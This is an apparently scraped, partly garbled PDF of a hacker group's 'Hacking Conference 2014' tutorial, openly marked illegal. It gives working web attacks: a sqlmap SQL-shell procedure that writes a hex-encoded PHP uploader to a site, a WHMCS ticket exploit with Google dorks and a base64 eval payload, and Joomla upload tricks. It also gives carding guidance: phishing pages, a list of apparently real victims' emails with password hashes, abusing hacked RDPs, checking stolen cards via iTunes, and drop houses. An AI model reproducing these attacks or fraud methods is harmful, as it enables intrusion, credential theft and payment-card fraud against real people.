hacking conference 2014
TRANSCRIPT
8/10/2019 Hacking Conference 2014
http://slidepdf.com/reader/full/hacking-conference-2014 1/22
DOCS HACKING CONFERENCEHacking Conference Docs is a documentation contains
articles about the basic science of hacking.
Part : II
Author : Xcaramel
100 % ILLEGAL
INDONESIAN GREY HAT ARMYRIAU HACKER TEAM
CODE RIAU COMMUNITY
8/10/2019 Hacking Conference 2014
http://slidepdf.com/reader/full/hacking-conference-2014 2/22
DISCLAIMER :
This article is for educational use only and do not in any use.
I am not responsible if anything happens.
Personal contact : [email protected]
Visit Us :
igha.net - code-riau.org - blog.code-riau.orgindogreyhatarmy.net - indogreyhatarmy.com
www.indogreyhatarmy.org
8/10/2019 Hacking Conference 2014
http://slidepdf.com/reader/full/hacking-conference-2014 3/22
Article Content
- How to upload shell use sqlmap- how to upload file in joomla administrator that do not
support- How to Bypass Register Com Users set only for
superadmin- WHMCS Exploit Submit Ticket
- Carding the method scam page- How to use RDP- Checking CVV and Direct Carding
8/10/2019 Hacking Conference 2014
http://slidepdf.com/reader/full/hacking-conference-2014 4/22
-How to upload shell use sqlmap
1 . First we must have a target first course,example my targethttp://www.example.com/index.php?id=1
2. prepare your uploader script, as below.
PHP Code:
<form enctype ="multipart/form-data" action ="upload.php" method ="POST" ><input name ="uploadedfile" type ="file" />< input type ="submit" value ="Upload File" /></ form > <? php $target_path =basename ( $_FILES [ 'uploadedfile' ][ 'name' ]);if( move_uploaded_file ( $_FILES [ 'uploadedfile' ][ 'tmp_name' ], $targe
t_path )){echo basename ( $_FILES [ 'uploadedfile' ][ 'name' ]). " has been uploaded" ;}else{echo "Error!" ;} ?>
previously used to convert the above script into a hex gan beforeit can be uploaded, the results are as belowConvert script Upload Hex --> http://www.string-functions.com/string-hex.a spx
PHP Code:
3c666f726d20656e63747970653d226d756c7469706172742f666f726d2d646174612220616374696f6e3
d2275706c6f61642e70687022206d6574686f643d22504f5354223e3c696e707574206e616d653d2275706c6f6164656466696c652220747970653d2266696c65222f3e3c696e70757420747970653d227375626d6974222076616c75653d2255706c6f61642046696c65222f3e3c2f666f726d3e0d0a3c3f70687020247461726765745f706174683d626173656e616d6528245f46494c45535b2775706c6f6164656466696c65275d5b276e616d65275d293b6966286d6f76655f75706c6f616465645f66696c6528245f46494c45535b2775706c6f6164656466696c65275d5b27746d705f6e616d65275d2c247461726765745f7061746829297b6563686f20626173656e616d6528245f46494c45535b2775706c6f6164656466696c65275d5b276e616d65275d292e2220686173206265656e2075706c6f61646564223b7d656c73657b6563686f20224572726f7221223b7d3f3e
Next Open Your CMDC:\user\xcaramel>cd c:\SqlmapC:\Sqlmap>C:\Sqlmap>sqlmap.py -u http://www.example.com/index.php?id=1 --sql-shell
would such as this :[15:35:06] [INFO] the back-end DBMS is MySQLweb server operating system: Windowsweb application technology: PHP 5.3.5, Apache 2.2.17
8/10/2019 Hacking Conference 2014
http://slidepdf.com/reader/full/hacking-conference-2014 5/22
back-end DBMS: MySQL 5[15:35:06] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER sql-shell>
Now type SELECT 0x'Hex 'INTO OUTFILE "PATH / filename";Do not forget to add '0 x 'in front of' HEX '0x3c666f726d20656e63747970653d226d756c7469706172742f666f726d2d646174612220616374696f6e3d2275706c6f61642e70687022206d6574686f643d22504f5354223e3c696e707574206e616d653d2275706c6f6164656466696c652220747970653d2266696c65222f3e3c696e70757420747970653d227375626d6974222076616c75653d2255706c6f61642046696c65222f3e3c2f666f726d3e0d0a3c3f70687020247461726765745f706174683d626173656e616d6528245f46494c45535b2775706c6f6164656466696c65275d5b276e616d65275d293b6966286d6f76655f75706c6f616465645f66696c6528245f46494c455
35b2775706c6f6164656466696c65275d5b27746d705f6e616d65275d2c247461726765745f7061746829297b6563686f 20626173656e616d6528245f46494c45535b2775706c6f6164656466696c65275d5b276e616d65275d292e2220686173206265656e2075706c6f61646564223b7d656c73657b6563686f20224572726f 7221223b7d3f3einto "/home/siemens/public_html/upload.php";
wait and if lucky you will be notified successfully uploaded, if less fortunate so try again
if it works please browse our files earlier,Http://www.example.com/upload.phpnext upload your files .
igha.net - code-riau.org - blog.code-riau.org - indogreyhatarmy.net - indogreyhatarmy.comwww.indogreyhatarmy.org
8/10/2019 Hacking Conference 2014
http://slidepdf.com/reader/full/hacking-conference-2014 6/22
- -how to uadministr
1. after login in th2. select options
load file in joomlator that do not sup
administrator open the media m
ort
nager
8/10/2019 Hacking Conference 2014
http://slidepdf.com/reader/full/hacking-conference-2014 7/22
Command: - Legalof files names, wesitu
and Illegal MIMEPHP in situ,3. if it is then we s
Now we try to uplwill upload a php
Extensions (File Types) there aresimply add the PHP file name, seq
ypes in the column we add the na
ve, if successful will be like this
ad a php file in media manager. Tile file name: kondom.php
any types ential in
e of the
his time I
8/10/2019 Hacking Conference 2014
http://slidepdf.com/reader/full/hacking-conference-2014 8/22
If Successfully wo
igha.net - code-riau.org - b
ld like
log.code-riau.org - indogreyhatarmy.net - indogrewww.indogreyhatarmy.org
hatarmy.com
8/10/2019 Hacking Conference 2014
http://slidepdf.com/reader/full/hacking-conference-2014 9/22
- How to Byset only foRegistration faileAdmin permisionaccounts.
The first - all the wayright-click and then c
pass Register Comr superadmin
: Registration failed: Only userscan change other Super Admin
out the word - the word "Registrationlick Inspect Elementlalu replace "Regist
sers
ith Super ser
ailed" you ration Failed"
8/10/2019 Hacking Conference 2014
http://slidepdf.com/reader/full/hacking-conference-2014 10/22
to "Registration Succ
Form input the datathen click on Registr
it will have the wordlink has been sent toactivate the accountemail before you can
igha.net - code-riau.org - b
ess" and then click Enter!!
ccording to your wishes tion
"our account has been created and anthe email address you entered. Note thby clicking on the activation link whenlogin."
log.code-riau.org - indogreyhatarmy.net - indogrewww.indogreyhatarmy.org
activation at you must
ou get the
hatarmy.com
8/10/2019 Hacking Conference 2014
http://slidepdf.com/reader/full/hacking-conference-2014 11/22
WHMCS Exploit Submit TicketGoogle Dork :intext:Powered by WHMCompleteSolution inurl:submitticket.php
intext:Powered by WHMCompleteSolution inurl:clients/submitticket.phpintext:Powered by WHMCompleteSolution inurl:client/submitticket.phpintext:Powered by WHMCompleteSolution inurl:clientsarea/submitticket.phpintext:Powered by WHMCompleteSolution inurl:clientarea/submitticket.phpintext:Powered by WHMCompleteSolution inurl:crm/submitticket.phpintext:Powered by WHMCompleteSolution inurl:cp/submitticket.phpintext:Powered by WHMCompleteSolution inurl:manage/submitticket.phpintext:Powered by WHMCompleteSolution inurl:member/submitticket.phpintext:Powered by WHMCompleteSolution inurl:members/submitticket.phpintext:Powered by WHMCompleteSolution inurl:billing/submitticket.phpintext:Powered by WHMCompleteSolution inurl:billings/submitticket.php
intext:Powered by WHMCompleteSolution inurl:support/submitticket.phpintext:Powered by WHMCompleteSolution inurl:help/submitticket.phpintext:Powered by WHMCompleteSolution inurl:secure/submitticket.phpintext:Powered by WHMCompleteSolution inurl:store/submitticket.phpintext:Powered by WHMCompleteSolution inurl:whmcs/submitticket.phpintext:Powered by WHMCompleteSolution inurl:log/submitticket.phpintext:Powered by WHMCompleteSolution inurl:myaccount/submitticket.phpintext:Powered by WHMCompleteSolution inurl:orders/submitticket.phpintext:Powered by WHMCompleteSolution inurl:order/submitticket.phpintext:Powered by WHMCompleteSolution inurl:portal/submitticket.phpintext:Powered by WHMCompleteSolution inurl:mc/submitticket.php
intext:Powered by WHMCompleteSolution inurl:office/submitticket.phpintext:Powered by WHMCompleteSolution inurl:submitticket.php site:comintext:Powered by WHMCompleteSolution inurl:submitticket.php site:orgintext:Powered by WHMCompleteSolution inurl:submitticket.php site:netintext:Powered by WHMCompleteSolution inurl:submitticket.php site:infointext:Powered by WHMCompleteSolution inurl:".*/*/submitticket.php"intext:Powered by WHMCompleteSolution inurl:".*/submitticket.php"
Examples of targets: www.xcaramel.com/client/submitticket.php
8/10/2019 Hacking Conference 2014
http://slidepdf.com/reader/full/hacking-conference-2014 12/22
3. if it can be now time to send the ticket targetPut the following code in the Form Name, subject, content.{php }eval( base64_decode ( 'JGNvZGUgPSBiYXNlNjRfZGVjb 2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJ qMGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltM TFiSFJwY0dGeWRDOW1iM0p0TFdSaGRHRWlJRzVoYldVOUluVnd iRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZMmh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDB pWm1sc1pTSWdjMmw2WlQwaU5UQWlQanhwYm5CMWRDQnVZVzFsU FNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFh Cc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzT kNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5Z G1hV3hsSjExYkozUnRjRjl1WVcxbEoxMHN
JQ1JmUmtsTVJWTmJ KMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dleUJsWTJodklDYzhZa jVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSStQR0p 5UGljN0lIME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzYjJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5JK1BHSnlQaWM3SUg wTkNuME5DajgrIik7DQokZm8gPSBmb3BlbigidGVtcGxhdGVzL 2p4aC5waHAiLCJ3Iik7DQpmd3JpdGUoJGZvLCRjb2RlKTt=' )) ;{/ php })
8/10/2019 Hacking Conference 2014
http://slidepdf.com/reader/full/hacking-conference-2014 13/22
replace url submitticket.ph
Example: http://xcaramel.
Next : upload youigha.net - code-riau.org - b
p so / templates / jxh.php
om/client/templates/jxh.php
files .log.code-riau.org - indogreyhatarmy.net - indogre
www.indogreyhatarmy.org
hatarmy.com
8/10/2019 Hacking Conference 2014
http://slidepdf.com/reader/full/hacking-conference-2014 14/22
- Carding th1. Scam page: PAYPA2. Inbox Mailer: Toolinbox detective not t3. Mail list: some emFull Name :James Kamau : jkidamOnline Standard : onlineFidel Osano :fosanoMatthewShahi : mshahPeter Munji : pmunjiLucy kaigua : lkaigua
Peter Njau : pnjauDorcas Tuikong : dtuikoLeonard indiazi : lindiazStandard Test : jmuny
4. Letter Chase: emaiemail containing a cidentity will switch t
5. Thinking ability an- Step Step In Here
method scam pag L, VISA, AMAZON, Ebay, Apple s for sending mail to many people direc
o spam ail that you want to at least 100 victims
Email : Password [email protected] : 66e62a11e534d2a5eb
standardmedia.co.ke : d593fe21fbc9cf394e2 standardmedia.co.ke : a387b826d086fa84db
@standardmedia.co.ke : 9d593fe21fbc9cf394e @standardmedia.co.ke : d10b4c5c4f54832b49 @standardmedia.co.ke : e1cd51b7ccf75ddebc
standardmedia.co.ke : 089543e7ade4bef696 [email protected] : 22479cdfaa364ff81a
[email protected] : fc63540458ad4ce5c [email protected] :7c7bbd96546a331b
l in html format which will be sent to tnfirmation email from the web in a scaour webscam
d imagination in developing a combat t
ly to your
jadiin email
e062d0ca2b6be 6725e6b8586
5335e80ed27a1 296725e6b8586
e0aaf1c33cd8d 270e19cbba31b
39c9d96c952b2 3bff00544790d
48cde5f07ccefc 8c24258e63b65
e target to charge
ol
8/10/2019 Hacking Conference 2014
http://slidepdf.com/reader/full/hacking-conference-2014 15/22
• First we have to edprocess.php or usualcode: $ No email senchange in process.phshell-other• The second we do- First we have to setsee the picture belo
it can be changed anpaypal.com com atotell of course, we hasee the following pic
it some parts of the scam page, which ily converted into a send-cc.php find thed in depanya aja tuh change so email, ap The next plug in your scam page hosti
se email sending mailers jangn forget l up the email subject that will be used
:
the key should not wear that in the eato do away with paypal.co co.uk, aftere to think
ure:
part following
ter email ng and other
tternya ore dal,
d domains. that what we
8/10/2019 Hacking Conference 2014
http://slidepdf.com/reader/full/hacking-conference-2014 16/22
The red line is transfindependence, edit iand put the letter inremember do not ussee the following pic
if successful then the
igha.net - code-riau.org - b
rmed into a scam link you here we areusing notepad, then after that copy allhe column do not forget to email a curplain html.
ure:
re is success and if the notice failing un
log.code-riau.org - indogreyhatarmy.net - indogrewww.indogreyhatarmy.org
in need of the scripts
ent tick
efine.
hatarmy.com
8/10/2019 Hacking Conference 2014
http://slidepdf.com/reader/full/hacking-conference-2014 17/22
- How to use RDP
RDP stands for Remote Desktop Computer; they are normally hackedor bruted random computers.When using you must remember its someone else's computer sodon't download things withouthiding it or use it intensely as the admin can notice, and you will loseyour RDP.
To connect to RDP: Start<Run<Type:mstscA screen will pop up waiting for an IP to be typed.Type the IP and hit connect. The person you bought RDP from will tellyou the login info.When you buy an RDP it will usually look something like thisIP: 98.200.27.44U: administrator P:
After connecting make sure it has Firefox, if not download Firefoxportable and hide itsomewhere within the computer so it can be used without them
noticing.
Download Link:http://portableapps.com/apps/internet/firefox_portableAfter opening the Firefox add the Sock5 that you will be using tomake your IP appear in the cc holder’s area.This is generally secure enough for basic carding but if you want totake the extra
precaution you can connect to the RDP through a VPN. For those whodon’t know, VPN is short for virtual private network, a network that isconstructed by using public wires to connect nodes. These systemsuse encryption and other security mechanisms to ensure that onlyauthorized users can access the network and that the data cannot beintercepted. I don't
8/10/2019 Hacking Conference 2014
http://slidepdf.com/reader/full/hacking-conference-2014 18/22
love VPN's because even though some sites say they don't log in factthey do. If theFeds/Cops contacted your VPN provider, they have ways of seeingwhere and what you have beenconnecting/doing on the net through their VPN. But it still does cover your IP one more wayso it isn't bad to have a VPN.
There are two sites I recommend for VPN.http://secretsline.biz/en/prices/http://unblockvpn.com/
Secrets Line is a higher quality VPN and has many more locations. Irecommend them but they
don't take payments like PayPal or Money Bookers, and their pricesare a bit higher.Unblockvpn is very cheap for a dedicated IP, only 10$ a month andthey accept PayPal so itis a much more convenient and cheaper, but the VPN service is a bitless professional.
So to sum it up for security1. Change/Cap your network using Sock52. Use Sock5 on RDP to make it more secure3. Total security :(Optional but recommended) VPN<RDP<Sock5How
to Access an RDPIf you are using Windows XP, click Start>RunIf you are using Vista or Windows 7, Click start and in the Entry fieldthat says “Search Programs and Files”
For Apple/Mac computers then please download this program for connecting to RDPwww.microsoft.com/mac/products/remote-desktop/default.mspxType in “mstsc” and hit enter. This will bring up the Remote DesktopWindow. Follow the images provided here to give you a better idea of what to do
8/10/2019 Hacking Conference 2014
http://slidepdf.com/reader/full/hacking-conference-2014 19/22
igha.net - code-riau.org - blog.code-riau.org - indogreyhatarmy.net - indogreyhatarmy.comwww.indogreyhatarmy.org
8/10/2019 Hacking Conference 2014
http://slidepdf.com/reader/full/hacking-conference-2014 20/22
- Checking CVV and Direct Carding
The best place to check CVV's is actually iTunes.. Make a new account and simply add the credit card onto it. If it getsaccepted then the credit card is alive and working well if declinedthen the credit card is dead. Many believe that its best to donate for checkingcredit's but it raises a flag to banks when they see random donationsto places like the redcross foundation.
Checked Vs. Unchecked CVV's When a vendor says the credit card ischecked it means he has checked it and is alive, this usually means he has his own checker or merchant account that has this ability. I don’t recommend buyingchecked CVVs as they will usually die quicker and get flagged bybanks. I always buy small amounts of unchecked CVV's at atime and use them within a day so that if it is dead,the vendor can replace. Most vendors replace unchecked within 24hours and don’treplace checkedcredit cards.
Carding Directly Without GiftcardNEVER this will almost always be investigated and highly illegal. Theonly way to do this would be if you have a drop house. This meansAn empty home, a house for sale/renting, or justa house that the person is not there. You can but I don’t recommendto card items directly therehalf the time the item will not be left at the door and it can bedangerous as sometimes thecops will investigate it.If you’regoing to do this it can be successful, but don’t ever order to your
8/10/2019 Hacking Conference 2014
http://slidepdf.com/reader/full/hacking-conference-2014 21/22
8/10/2019 Hacking Conference 2014
http://slidepdf.com/reader/full/hacking-conference-2014 22/22
SPESIAL THANKS :
INDONESIAN GREY HAT ARMYRIAU HACKER TEAM
CODE RIAU COMMUNITY
ALL FAMILY INDONESIAN GREY HAT ARMYXie Log - Xcaramel – Xsmouth - SF-Resistance 125 - Codex
H4xor - Ac.Dc - 4Sp1r3 - Biawak Litak - Heartachez - Semeru -The Darkness - Blackboot404 - Zhafran - Ghozie - Otong2 -
Ryuunosuke-sama - CakCukLet88 - D'troid 101 - tioblack67 -indeX - AR.1701 – K4mfret Dot ID and all member .
ALL FAMILY RIAU HACKER TEAMXie Log - 730-80Y – Key Lock a.k.a F4Lc0n – Ghozie - Juragan
JengkoL – Gue Berbagi a.k.a Echo Unicode - 0tong2 – Zh4fran – index and all member .
AND YOU THANK YOU